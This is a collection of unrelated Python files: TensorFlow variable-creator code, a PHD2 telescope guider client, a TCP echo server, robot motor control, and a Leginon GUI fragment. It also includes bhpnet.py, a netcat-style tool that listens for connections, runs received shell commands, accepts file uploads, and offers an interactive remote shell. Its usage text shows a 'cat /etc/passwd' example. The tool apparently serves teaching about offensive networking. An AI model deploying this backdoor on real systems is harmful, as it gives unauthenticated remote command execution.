distribute_strategy = kwargs.get("distribute_strategy", None)
synchronization = kwargs.get("synchronization", None)
aggregation = kwargs.get("aggregation", None)
shape = kwargs.get("shape", None)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value,
trainable=trainable,
validate_shape=validate_shape,
caching_device=caching_device,
name=name,
dtype=dtype,
constraint=constraint,
variable_def=variable_def,
import_scope=import_scope,
distribute_strategy=distribute_strategy,
synchronization=synchronization,
aggregation=aggregation,
shape=shape)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True`, unless `synchronization` is
set to `ON_READ`, in which case it defaults to `False`.
* collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
* dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
* use_resource: if True, a ResourceVariable is always created.
  * synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
* initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
* trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
* validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
* caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
* name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
  * dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
* constraint: A constraint function to be applied to the variable after
updates by some algorithms.
  * synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize.
* aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
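# Hedged sketch (not part of the original module): a minimal custom creator
# matching the signature documented above. The name `_example_frozen_creator`
# is illustrative only.
def _example_frozen_creator(next_creator, **kwargs):
  """Creates variables via `next_creator`, forcing them to be non-trainable."""
  kwargs["trainable"] = False
  return next_creator(**kwargs)
# Typical use:
#   with variable_creator_scope(_example_frozen_creator):
#     v = variables.Variable(1.0)  # created with trainable=False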
|
guider.py
|
import copy
import json
import math
import selectors
import socket
import threading
import time
class SettleProgress:
"""Info related to progress of settling after guiding starts or after
a dither
"""
def __init__(self):
self.Done = False
self.Distance = 0.0
self.SettlePx = 0.0
self.Time = 0.0
self.SettleTime = 0.0
self.Status = 0
self.Error = ''
class GuideStats:
"""cumulative guide stats since guiding started and settling
completed
"""
def __init__(self):
self.rms_tot = 0.0
self.rms_ra = 0.0
self.rms_dec = 0.0
self.peak_ra = 0.0
self.peak_dec = 0.0
class GuiderException(Exception):
"""GuiderException is the base class for any excettions raied by the
Guider methods
"""
pass
class _Accum:
def __init__(self):
self.Reset()
def Reset(self):
self.n = 0
self.a = self.q = self.peak = 0
    def Add(self, x):
        # Welford's online update: track the absolute peak, the running
        # mean (a) and the sum of squared deviations from the mean (q).
        ax = abs(x)
        if ax > self.peak:
            self.peak = ax
        self.n += 1
        d = x - self.a
        self.a += d / self.n
        self.q += (x - self.a) * d
def Mean(self):
return self.a
def Stdev(self):
return math.sqrt(self.q / self.n) if self.n >= 1 else 0.0
def Peak(self):
return self.peak
class _Conn:
def __init__(self):
self.lines = []
self.buf = b''
self.sock = None
self.sel = None
self.terminate = False
def __del__(self):
self.Disconnect()
def Connect(self, hostname, port):
self.sock = socket.socket()
try:
self.sock.connect((hostname, port))
self.sock.setblocking(False) # non-blocking
self.sel = selectors.DefaultSelector()
self.sel.register(self.sock, selectors.EVENT_READ)
except Exception:
self.sel = None
self.sock = None
raise
def Disconnect(self):
if self.sel is not None:
self.sel.unregister(self.sock)
self.sel = None
if self.sock is not None:
self.sock.close()
self.sock = None
def IsConnected(self):
return self.sock is not None
def ReadLine(self):
#print(f"DBG: ReadLine enter lines:{len(self.lines)}")
while not self.lines:
#print("DBG: begin wait")
while True:
if self.terminate:
return ''
events = self.sel.select(0.5)
if events:
break
#print("DBG: call recv")
s = self.sock.recv(4096)
#print(f"DBG: recvd: {len(s)}: {s}")
i0 = 0
i = i0
while i < len(s):
if s[i] == b'\r'[0] or s[i] == b'\n'[0]:
self.buf += s[i0 : i]
if self.buf:
self.lines.append(self.buf)
self.buf = b''
i += 1
i0 = i
else:
i += 1
self.buf += s[i0 : i]
return self.lines.pop(0)
def WriteLine(self, s):
b = s.encode()
totsent = 0
while totsent < len(b):
sent = self.sock.send(b[totsent:])
if sent == 0:
raise RuntimeError("socket connection broken")
totsent += sent
def Terminate(self):
self.terminate = True
class Guider:
"""The main class for interacting with PHD2"""
DEFAULT_STOPCAPTURE_TIMEOUT = 10
def __init__(self, hostname = "localhost", instance = 1):
self.hostname = hostname
self.instance = instance
self.conn = None
self.terminate = False
self.worker = None
self.lock = threading.Lock()
self.cond = threading.Condition()
self.response = None
self.AppState = ''
self.AvgDist = 0
self.Version = ''
self.PHDSubver = ''
self.accum_active = False
self.settle_px = 0
self.accum_ra = _Accum()
self.accum_dec = _Accum()
self.Stats = GuideStats()
self.Settle = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.Disconnect()
@staticmethod
def _is_guiding(st):
return st == "Guiding" or st == "LostLock"
@staticmethod
def _accum_get_stats(ra, dec):
stats = GuideStats()
stats.rms_ra = ra.Stdev()
stats.rms_dec = dec.Stdev()
stats.peak_ra = ra.Peak()
stats.peak_dec = dec.Peak()
return stats
def _handle_event(self, ev):
e = ev["Event"]
if e == "AppState":
with self.lock:
self.AppState = ev["State"]
if self._is_guiding(self.AppState):
self.AvgDist = 0 # until we get a GuideStep event
elif e == "Version":
with self.lock:
self.Version = ev["PHDVersion"]
self.PHDSubver = ev["PHDSubver"]
elif e == "StartGuiding":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.Stats = stats
elif e == "GuideStep":
if self.accum_active:
self.accum_ra.Add(ev["RADistanceRaw"])
self.accum_dec.Add(ev["DECDistanceRaw"])
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
with self.lock:
self.AppState = "Guiding"
self.AvgDist = ev["AvgDist"]
if self.accum_active:
self.Stats = stats
elif e == "SettleBegin":
self.accum_active = False # exclude GuideStep messages from stats while settling
elif e == "Settling":
s = SettleProgress()
s.Done = False
s.Distance = ev["Distance"]
s.SettlePx = self.settle_px
s.Time = ev["Time"]
s.SettleTime = ev["SettleTime"]
s.Status = 0
with self.lock:
self.Settle = s
elif e == "SettleDone":
self.accum_active = True
self.accum_ra.Reset()
self.accum_dec.Reset()
stats = self._accum_get_stats(self.accum_ra, self.accum_dec)
s = SettleProgress()
s.Done = True
s.Status = ev["Status"]
s.Error = ev.get("Error")
with self.lock:
self.Settle = s
self.Stats = stats
elif e == "Paused":
with self.lock:
self.AppState = "Paused"
elif e == "StartCalibration":
with self.lock:
self.AppState = "Calibrating"
elif e == "LoopingExposures":
with self.lock:
self.AppState = "Looping"
elif e == "LoopingExposuresStopped" or e == "GuidingStopped":
with self.lock:
self.AppState = "Stopped"
elif e == "StarLost":
with self.lock:
self.AppState = "LostLock"
self.AvgDist = ev["AvgDist"]
else:
#print(f"DBG: todo: handle event {e}")
pass
def _worker(self):
while not self.terminate:
line = self.conn.ReadLine()
#print(f"DBG: L: {line}")
if not line:
if not self.terminate:
# server disconnected
#print("DBG: server disconnected")
pass
break
try:
j = json.loads(line)
except json.JSONDecodeError:
# ignore invalid json
#print("DBG: ignoring invalid json response")
continue
if "jsonrpc" in j:
# a response
#print(f"DBG: R: {line}\n")
with self.cond:
self.response = j
self.cond.notify()
else:
self._handle_event(j)
def Connect(self):
"""connect to PHD2 -- call Connect before calling any of the server API methods below"""
self.Disconnect()
try:
self.conn = _Conn()
self.conn.Connect(self.hostname, 4400 + self.instance - 1)
self.terminate = False
self.worker = threading.Thread(target=self._worker)
self.worker.start()
#print("DBG: connect done")
except Exception:
self.Disconnect()
raise
def Disconnect(self):
"""disconnect from PHD2"""
if self.worker is not None:
if self.worker.is_alive():
#print("DBG: terminating worker")
self.terminate = True
self.conn.Terminate()
#print("DBG: joining worker")
self.worker.join()
self.worker = None
if self.conn is not None:
self.conn.Disconnect()
self.conn = None
#print("DBG: disconnect done")
@staticmethod
def _make_jsonrpc(method, params):
req = {
"method": method,
"id": 1
}
if params is not None:
if isinstance(params, (list, dict)):
req["params"] = params
else:
# single non-null parameter
req["params"] = [ params ]
return json.dumps(req,separators=(',', ':'))
@staticmethod
def _failed(res):
return "error" in res
def Call(self, method, params = None):
"""this function can be used for raw JSONRPC method
invocation. Generally you won't need to use this as it is much
more convenient to use the higher-level methods below
"""
s = self._make_jsonrpc(method, params)
#print(f"DBG: Call: {s}")
# send request
self.conn.WriteLine(s + "\r\n")
# wait for response
with self.cond:
while not self.response:
self.cond.wait()
response = self.response
self.response = None
if self._failed(response):
raise GuiderException(response["error"]["message"])
return response
def _CheckConnected(self):
if not self.conn.IsConnected():
raise GuiderException("PHD2 Server disconnected")
def Guide(self, settlePixels, settleTime, settleTimeout):
"""Start guiding with the given settling parameters. PHD2 takes care
of looping exposures, guide star selection, and settling. Call
CheckSettling() periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = 0
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot guide while settling")
self.Settle = s
try:
self.Call(
"guide",
[
{
"pixels" : settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
False, # don't force calibration
]
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def Dither(self, ditherPixels, settlePixels, settleTime, settleTimeout):
"""Dither guiding with the given dither amount and settling parameters. Call CheckSettling()
periodically to see when settling is complete.
"""
self._CheckConnected()
s = SettleProgress()
s.Done = False
s.Distance = ditherPixels
s.SettlePx = settlePixels
s.Time = 0
s.SettleTime = settleTime
s.Status = 0
with self.lock:
if self.Settle and not self.Settle.Done:
raise GuiderException("cannot dither while settling")
self.Settle = s
try:
self.Call(
"dither",
[
ditherPixels,
False,
{
"pixels" : settlePixels,
"time": settleTime,
"timeout": settleTimeout,
},
]
)
self.settle_px = settlePixels
except Exception:
with self.lock:
self.Settle = None
raise
def IsSettling(self):
"""Check if phd2 is currently in the process of settling after a Guide
or Dither"""
self._CheckConnected()
with self.lock:
if self.Settle:
return True
# for app init, initialize the settle state to a consistent
# value as if Guide had been called
res = self.Call("get_settling")
val = res["result"]
if val:
s = SettleProgress()
s.Done = False
s.Distance = -1.0
s.SettlePx = 0.0
s.Time = 0.0
s.SettleTime = 0.0
s.Status = 0
with self.lock:
if self.Settle is None:
self.Settle = s
return val
def CheckSettling(self):
"""Get the progress of settling"""
self._CheckConnected()
ret = SettleProgress()
with self.lock:
if not self.Settle:
raise GuiderException("not settling")
if self.Settle.Done:
# settle is done
ret.Done = True
ret.Status = self.Settle.Status
ret.Error = self.Settle.Error
self.Settle = None
else:
# settle in progress
ret.Done = False
ret.Distance = self.Settle.Distance
ret.SettlePx = self.settle_px
ret.Time = self.Settle.Time
ret.SettleTime = self.Settle.SettleTime
return ret
def GetStats(self):
"""Get the guider statistics since guiding started. Frames captured
while settling is in progress are excluded from the stats.
"""
self._CheckConnected()
with self.lock:
stats = copy.copy(self.Stats)
stats.rms_tot = math.hypot(stats.rms_ra, stats.rms_dec)
return stats
def StopCapture(self, timeoutSeconds = 10):
"""stop looping and guiding"""
self.Call("stop_capture")
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Stopped":
return
time.sleep(1)
self._CheckConnected()
# hack! workaround bug where PHD2 sends a GuideStep after stop
# request and fails to send GuidingStopped
res = self.Call("get_app_state")
st = res["result"]
with self.lock:
self.AppState = st
if st == "Stopped":
return
# end workaround
raise GuiderException(f"guider did not stop capture after {timeoutSeconds} seconds!")
def Loop(self, timeoutSeconds = 10):
"""start looping exposures"""
self._CheckConnected()
# already looping?
with self.lock:
if self.AppState == "Looping":
return
res = self.Call("get_exposure")
exp = res["result"]
self.Call("loop")
time.sleep(exp)
for i in range(0, timeoutSeconds):
with self.lock:
if self.AppState == "Looping":
return
time.sleep(1)
self._CheckConnected()
raise GuiderException("timed-out waiting for guiding to start looping")
def PixelScale(self):
"""get the guider pixel scale in arc-seconds per pixel"""
res = self.Call("get_pixel_scale")
return res["result"]
def GetEquipmentProfiles(self):
"""get a list of the Equipment Profile names"""
res = self.Call("get_profiles")
profiles = []
for p in res["result"]:
profiles.append(p["name"])
return profiles
def ConnectEquipment(self, profileName):
"""connect the equipment in an equipment profile"""
res = self.Call("get_profile")
prof = res["result"]
if prof["name"] != profileName:
res = self.Call("get_profiles")
profiles = res["result"]
profid = -1
for p in profiles:
name = p["name"]
if name == profileName:
profid = p.get("id", -1)
break
if profid == -1:
raise GuiderException(f"invalid phd2 profile name: {profileName}")
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
self.Call("set_profile", profid)
self.Call("set_connected", True)
def DisconnectEquipment(self):
"""disconnect equipment"""
self.StopCapture(self.DEFAULT_STOPCAPTURE_TIMEOUT)
self.Call("set_connected", False)
def GetStatus(self):
"""get the AppState
(https://github.com/OpenPHDGuiding/phd2/wiki/EventMonitoring#appstate)
and current guide error
"""
self._CheckConnected()
with self.lock:
return self.AppState, self.AvgDist
def IsGuiding(self):
"""check if currently guiding"""
st, dist = self.GetStatus()
return self._is_guiding(st)
def Pause(self):
"""pause guiding (looping exposures continues)"""
self.Call("set_paused", True)
def Unpause(self):
"""un-pause guiding"""
self.Call("set_paused", False)
    def SaveImage(self):
        """save the current guide camera frame (FITS format), returning the
        name of the saved file. The caller will need to remove the file
        when done.
        """
res = self.Call("save_image")
return res["result"]["filename"]
|
bhpnet.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 22 17:22:56 2020
@author: edoardottt
"""
import sys
import socket
import getopt
import threading
import subprocess
# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
print(
"""
____ _ _ ____ _ _ _
| __ )| | | | _ \| \ | | ___| |_
| _ \| |_| | |_) | \| |/ _ \ __|
| |_) | _ | __/| |\ | __/ |_
|____/|_| |_|_| |_| \_|\___|\__|"""
)
def usage():
print("")
print("Usage: bhpnet.py -t target_host -p port")
print(
"""-l --listen - listen on [host]:[port] for
incoming connections"""
)
print(
"""-e --execute=fle_to_run - execute the given file upon
receiving a connection"""
)
print("""-c --command - initialize a command shell""")
print(
"""-u --upload=destination - upon receiving connection upload a
file and write to [destination]"""
)
print("")
print("")
print("Examples: ")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -c")
print("bhpnet.py -t 192.168.0.1 -p 5555 -l -u=C:\\target.exe")
print('bhpnet.py -t 192.168.0.1 -p 5555 -l -e="cat /etc/passwd"')
print("echo 'ABCDEFGHI' | ./bhpnet.py -t 192.168.11.12 -p 135")
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the command line options
try:
        opts, args = getopt.getopt(
            sys.argv[1:],
            "hle:t:p:cu:",
            ["help", "listen", "execute=", "target=", "port=", "command", "upload="],
        )
except getopt.GetoptError as err:
print(str(err))
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--command"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
def server_loop():
global target
# if no target is defined, we listen on all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
        # spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target, port))
        if len(buffer):
            client.send(buffer.encode())
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data.decode(errors="ignore")
if recv_len < 4096:
break
print(response)
# wait for more input
buffer = input("")
buffer += "\n"
# send it off
client.send(buffer.encode())
except:
print("[*] Exception! Exiting")
# tear down the connection
client.close()
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
        # read in all of the bytes and write to our destination
        file_buffer = b""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
            client_socket.send(
                "Successfully saved file to {}\r\n".format(upload_destination).encode()
            )
        except:
            client_socket.send(
                "Failed to save file to {}\r\n".format(upload_destination).encode()
            )
# check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send(b"<BHP:#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = b""
while b"\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
    # send the output back to the client
return output
if __name__ == "__main__":
    main()
|
tcp_server.py
|
#! /data/sever/python/bin/python
# -*- coding:utf-8 -*-
"""
@author: 'root'
@date: '3/2/16'
"""
__author__ = 'root'
import socket
import threading
bind_ip = "0.0.0.0"
bind_port = 9999
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((bind_ip, bind_port))
server.listen(5)
print "Listen:%s" % ((bind_ip, bind_port),)
def handle_client(client_socket):
request = client_socket.recv(1024)
print "Recv:%s" % request
client_socket.send("ACK!")
client_socket.close()
while True:
client, addr = server.accept()
    print(client, addr)
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
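# Hedged companion sketch (not part of this file): a minimal client for the
# server above, kept as a comment since the accept loop never returns.
#
#   import socket
#   client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   client.connect(("127.0.0.1", 9999))
#   client.send(b"hello server")
#   print(client.recv(4096))
#   client.close()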
|
motor_lib.py
|
import re
import enum
import time
from threading import Thread
from roboclaw import Roboclaw
import maestro
DEFAULT_TIME_TO_DELAY_MOTOR = 0.02 # 20 milliseconds
MAX_MOTOR_SPEED = 100 # max speed from client
MAX_MOTOR_POWER = 120 # max power to bucket motor controller
MAX_DRIVE_MOTOR_RPM = 4000  # max rpm for the drive motor controllers
motorMessageRegex = re.compile(r'([\w])([-]*[\d]+)\|')
servoTTYAddressRegex = re.compile(r'/dev/ttyACM([\d]+)')
class SubMessagePrefix(enum.Enum):
LEFT_MOTOR = 'l'
RIGHT_MOTOR = 'r'
ACTUATOR = 'a'
BUCKET = 'b'
SERVO = 's'
class RoboclawStatus(enum.Enum):
CONNECTED = 'Roboclaw Connected'
DISCONNECTED = 'Roboclaw Disconnected'
"""
To set /dev/roboclaw using udev rules, follow this guide:
https://www.linux.com/learn/build-road-raspberry-pi-robot-part-2
"""
class MotorConnection:
def __init__(self, roboclaw_port='/dev/roboclaw',
baud_rate=115200,
left_drive_address=0x82, right_drive_address=0x83,
actuator_address=0x80, dig_address=0x83, conveyorAddress=0x81):
self.roboclaw = Roboclaw(roboclaw_port, baud_rate)
if self.roboclaw.Open():
self.status = RoboclawStatus.CONNECTED
else:
self.status = RoboclawStatus.DISCONNECTED
print(self.status)
print('MotorConnection initialized.')
self.left_drive_address = left_drive_address
self.right_drive_address = right_drive_address
self.actuator_address = actuator_address
self.dig_address = dig_address
self.conveyorAddress = conveyorAddress
self.bucketAddress = 0x81
self.left_motor_speed = 0
self.right_motor_speed = 0
self.actuator_motor_speed = 0
self.bucket_motor_speed = 0
self.camera_actuator_speed = 0
self.camera_servo_speed = 0
@staticmethod
def direction_of_speed(speed):
if speed >= 0:
return 1
else:
return -1
    def are_speed_directions_equal(self, speed1, speed2):
        return self.direction_of_speed(speed1) == self.direction_of_speed(speed2)
@staticmethod
def convert_speed_to_power(speed):
if abs(speed) > MAX_MOTOR_SPEED:
return 0
else:
power_percentage = float(speed) / float(MAX_MOTOR_SPEED)
power = int(power_percentage * float(MAX_MOTOR_POWER))
return power
@staticmethod
def convert_speed_to_rpm(speed):
if abs(speed) > MAX_MOTOR_SPEED:
return 0
else:
power_percentage = float(speed) / float(MAX_MOTOR_SPEED)
power = int(power_percentage * float(MAX_DRIVE_MOTOR_RPM))
return power
def left_drive(self, speed):
if not self.are_speed_directions_equal(speed, self.left_motor_speed):
print('Left motor speed changed direction.')
self.roboclaw.ForwardM2(self.left_drive_address, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Left motor at speed:', speed, '%')
self.left_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Left motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM2(self.left_drive_address, power)
self.roboclaw.BackwardM1(self.left_drive_address, power)
else:
self.roboclaw.ForwardM2(self.left_drive_address, abs(power))
self.roboclaw.ForwardM1(self.left_drive_address, abs(power))
def right_drive(self, speed):
if not self.are_speed_directions_equal(speed, self.right_motor_speed):
            print('Right motor speed changed direction.')
self.roboclaw.ForwardM1(self.right_drive_address, 0)
self.roboclaw.ForwardM2(self.right_drive_address, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Right motor at speed:', speed, '%')
self.right_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Right motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM1(self.right_drive_address, power)
self.roboclaw.BackwardM2(self.right_drive_address, power)
else:
self.roboclaw.ForwardM1(self.right_drive_address, abs(power))
self.roboclaw.ForwardM2(self.right_drive_address, abs(power))
def camera_actuate(self, speed):
pass
def camera_rotate(self, speed):
pass
def bucket_actuate(self, speed):
if not self.are_speed_directions_equal(speed, self.actuator_motor_speed):
print('Actuator motor speed changed direction.')
self.roboclaw.ForwardM1(self.bucketAddress, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Actuator motor at speed:', speed, '%')
self.actuator_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Actuator motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM1(self.bucketAddress, power)
else:
self.roboclaw.ForwardM1(self.bucketAddress, abs(power))
def bucket_rotate(self, speed):
if not self.are_speed_directions_equal(speed, self.bucket_motor_speed):
print('Bucket motor speed changed direction.')
self.roboclaw.ForwardM1(self.bucketAddress, 0)
time.sleep(DEFAULT_TIME_TO_DELAY_MOTOR)
print('Bucket motor at speed:', speed, '%')
self.bucket_motor_speed = speed
power = self.convert_speed_to_power(speed)
print('Bucket motor at power:', power)
if power >= 0:
self.roboclaw.BackwardM1(self.bucketAddress, power)
else:
self.roboclaw.ForwardM1(self.bucketAddress, abs(power))
def conveyor_rotate(self, speed):
#Change direction code missing
        speed_conveyor = speed
        power = self.convert_speed_to_power(speed)
self.roboclaw.ForwardM1(self.conveyorAddress, abs(power))
# motor1=self.roboclaw.ReadEncM1(0x83)
# print(motor1)
# self.roboclaw.SpeedM1(0x83, 8)
def parse_message(self, message):
sub_messages = motorMessageRegex.findall(message)
threads = []
for sub_message in sub_messages:
motor_prefix = sub_message[0]
speed = int(sub_message[1])
try:
                if motor_prefix == SubMessagePrefix.LEFT_MOTOR.value:
                    left_motor_thread = Thread(name='leftMotorThread',
                                               target=self.left_drive,
                                               args=(-speed,))
                    threads.append(left_motor_thread)
                    left_motor_thread.start()
                elif motor_prefix == SubMessagePrefix.RIGHT_MOTOR.value:
                    right_motor_thread = Thread(name='rightMotorThread',
                                                target=self.right_drive,
                                                args=(speed,))
                    threads.append(right_motor_thread)
                    right_motor_thread.start()
                elif motor_prefix == SubMessagePrefix.ACTUATOR.value:
                    actuator_thread = Thread(name='actuatorThread',
                                             target=self.bucket_actuate,
                                             args=(speed,))
                    threads.append(actuator_thread)
                    actuator_thread.start()
                elif motor_prefix == SubMessagePrefix.BUCKET.value:
                    bucket_thread = Thread(name='bucketThread',
                                           target=self.bucket_rotate,
                                           args=(speed,))
                    threads.append(bucket_thread)
                    bucket_thread.start()
else:
print('MotorPrefix "', motor_prefix, '" unrecognized.')
except AttributeError:
self.status = RoboclawStatus.DISCONNECTED
print('Roboclaw disconnected...retrying connection')
if self.roboclaw.Open():
print('Roboclaw connected...retrying command')
self.status = RoboclawStatus.CONNECTED
#self.parse_message(message)
for thread in threads:
thread.join()
def close(self):
print('Closed connection:', self.roboclaw.Close())
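# Hedged usage sketch (not part of the original module): a control message is
# a string of <prefix><signed integer>| sub-messages using the prefixes from
# SubMessagePrefix, e.g. "l50|r-50|b100|". Requires a Roboclaw on
# /dev/roboclaw, so it only runs when this file is executed directly.
if __name__ == '__main__':
    connection = MotorConnection()
    connection.parse_message('l50|r-50|b100|')
    connection.close()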
|
MosaicTargetMaker.py
|
# The Leginon software is Copyright 2004
# The Scripps Research Institute, La Jolla, CA
# For terms of the license agreement
# see http://ami.scripps.edu/software/leginon-license
#
import re
import threading
import wx
from leginon.gui.wx.Entry import Entry, FloatEntry, IntEntry
import leginon.gui.wx.Node
from leginon.gui.wx.Presets import PresetChoice
from leginon.gui.wx.Choice import Choice
import leginon.gui.wx.Settings
import leginon.gui.wx.ToolBar
import leginon.gui.wx.Events
class Panel(leginon.gui.wx.Node.Panel):
icon = 'atlasmaker'
def __init__(self, *args, **kwargs):
leginon.gui.wx.Node.Panel.__init__(self, *args, **kwargs)
self.toolbar.AddTool(leginon.gui.wx.ToolBar.ID_SETTINGS,
'settings',
shortHelpString='Settings')
